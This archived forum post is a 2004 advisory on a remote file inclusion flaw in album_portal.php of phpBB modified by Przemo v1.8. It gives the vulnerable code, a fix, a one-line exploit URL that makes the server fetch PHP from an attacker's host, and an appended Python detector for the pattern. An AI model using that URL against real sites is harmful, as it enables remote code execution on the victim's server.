View Full Version : phpBB modified by Przemo arbitrary code execution



Dariusz 'Officerrr' Kolasinski
20/04/04, 12:15

--====----====----====----====----====----====----====----====----====----===--
Product: phpBB modified by Przemo
Version: v1.8
Vendor: http://przemo.org/phpBB2/
Discovered by: Officerrr <officerrr at poligon.com.pl>
Vendor Response: Not contacted yet...
Severity: Medium (arbitrary code execution as webserver user)
--====----====----====----====----====----====----====----====----====----===--
Description:

This modification is based on the phpBB 2.0.X script; it contains about
200 add-ons, with the ability to switch off any of them in the admin's panel.
--====----====----====----====----====----====----====----====----====----===--
Vulnerable code:
File: album_portal.php

$album_root_path = $phpbb_root_path . 'album_mod/';
include($album_root_path . 'album_common.'.$phpEx);

--====----====----====----====----====----====----====----====----====----===--
Fix:

Change the following lines in the album_portal.php file

$album_root_path = $phpbb_root_path . 'album_mod/';
include($album_root_path . 'album_common.'.$phpEx);


to



define('IN_PHPBB', true);
$phpbb_root_path = './';
$album_root_path = $phpbb_root_path . 'album_mod/';
include($phpbb_root_path . 'extension.inc');
include($album_root_path . 'album_common.'.$phpEx);

--====----====----====----====----====----====----====----====----====----===--
Exploit:
http://[victim_host]/album_portal.php?phpbb_root_path=http://[evil_host]/&phpEx=/../../[evil_file.php]

evil_file.php must exist on the evil_host.

--
Dariusz 'Officerrr' Kolasinski
<Linux Administrator> <gg: 516354>
"Living on a razors edge, Balancing on a ledge"

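
Added example, not part of the original advisory or of the phpBB/Przemo code: a heuristic Python check for the pattern in the vulnerable snippet above, an include whose path is built from variables the script never assigned itself, run against the two versions of album_portal.php quoted in the post. The function name and the line-by-line matching are assumptions of this example; it ignores control flow, functions and string interpolation.

```python
import re

# Heuristic patterns for flat, top-level PHP like the snippets in the advisory.
ASSIGN = re.compile(r"^\s*\$(\w+)\s*=\s*(.+?);")
INCLUDE = re.compile(r"\b(?:include|require)(?:_once)?\b\s*\(?(.+?)\)?\s*;")
VAR = re.compile(r"\$(\w+)")


def unassigned_include_vars(php_source):
    """Return [(line_no, [variable, ...])] for each include/require whose path
    uses a variable the script has not set from its own literals first."""
    trusted = set()
    findings = []
    for line_no, line in enumerate(php_source.splitlines(), 1):
        assign = ASSIGN.match(line)
        if assign:
            name, expr = assign.groups()
            # Trusted only if every variable on the right-hand side already is.
            if all(v in trusted for v in VAR.findall(expr)):
                trusted.add(name)
            else:
                trusted.discard(name)
            continue
        inc = INCLUDE.search(line)
        if not inc:
            continue
        path = inc.group(1)
        unset = [v for v in VAR.findall(path) if v not in trusted]
        if unset:
            findings.append((line_no, unset))
        elif "extension.inc" in path:
            # Assumption: phpBB's extension.inc is what assigns $phpEx.
            trusted.add("phpEx")
    return findings


# The two versions of album_portal.php quoted in the advisory.
VULNERABLE = """\
$album_root_path = $phpbb_root_path . 'album_mod/';
include($album_root_path . 'album_common.'.$phpEx);
"""
FIXED = """\
define('IN_PHPBB', true);
$phpbb_root_path = './';
$album_root_path = $phpbb_root_path . 'album_mod/';
include($phpbb_root_path . 'extension.inc');
include($album_root_path . 'album_common.'.$phpEx);
"""
```

unassigned_include_vars(VULNERABLE) flags line 2 for both $album_root_path and $phpEx, while the FIXED version produces no findings because every variable in each include path is assigned by the script before use.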